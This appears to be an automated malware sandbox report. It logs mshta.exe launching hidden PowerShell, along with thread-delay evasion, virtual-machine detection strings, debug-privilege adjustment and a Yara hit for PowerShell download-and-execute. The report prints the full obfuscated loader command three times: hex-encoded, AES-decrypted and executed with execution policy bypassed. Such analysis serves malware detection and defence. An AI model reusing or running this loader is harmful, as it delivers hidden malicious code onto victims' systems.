    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3)
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3)Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04964A48 push 2007E851h; ret 1_2_04964A55
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2989Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 886Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3149Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4872Thread sleep time: -2767011611056431s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4804Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6156Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6980Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: mshta.exe, 00000000.00000003.1266500573.0000000002EB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}N
    Source: mshta.exe, 00000000.00000003.1266500573.0000000002EB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\3
    Source: powershell.exe, 00000006.00000002.1330449219.00000000077BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Yara detected Powershell download and execute
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTR
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3)Jump 